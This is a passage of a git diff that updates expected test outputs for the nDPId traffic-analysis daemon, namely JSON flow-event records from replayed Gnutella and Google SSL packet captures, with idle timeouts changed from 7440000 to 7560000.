00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82058,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.166.226.70","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.152.66.153","src_port":50194,"dst_port":43771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.152.66.153","src_port":50194,"dst_port":43771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.152.66.153","src_port":50194,"dst_port":43771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.152.66.153","src_port":50194,"dst_port":43771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":70230,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.131.85.245","src_port":28681,"dst_port":31743,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":70230,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.131.85.245","src_port":28681,"dst_port":31743,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67095,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67095,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67093,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67093,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.203.131","src_port":50242,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67095,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67095,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.210.81.147","src_port":50225,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67093,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67093,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"59.104.173.5","src_port":50221,"dst_port":49956,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493286,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.134.139.39","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493286,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.134.139.39","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.66.94.132","src_port":28681,"dst_port":17735,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.66.94.132","src_port":28681,"dst_port":17735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431829,"flow_last_seen":431829,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.132.75.56","src_port":28681,"dst_port":56009,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":431829,"flow_last_seen":431829,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"195.132.75.56","src_port":28681,"dst_port":56009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66076,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66076,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66076,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66076,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.193.171.146","src_port":50214,"dst_port":53808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86639,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":50277,"dst_port":36368,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":71205,"flow_last_seen":593376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":5915,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":71205,"flow_last_seen":593376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":5915,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":95716,"flow_last_seen":426518,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72853,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"167.114.170.156","src_port":28681,"dst_port":23844,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} diff --git a/test/results/google_ssl.pcap.out b/test/results/google_ssl.pcap.out index cfba946a0..72f990c51 100644 --- a/test/results/google_ssl.pcap.out +++ b/test/results/google_ssl.pcap.out 
@@ -1,11 +1,11 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"google_ssl.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434443394683} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434443394683,"flow_last_seen":1434443394683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434443394683,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
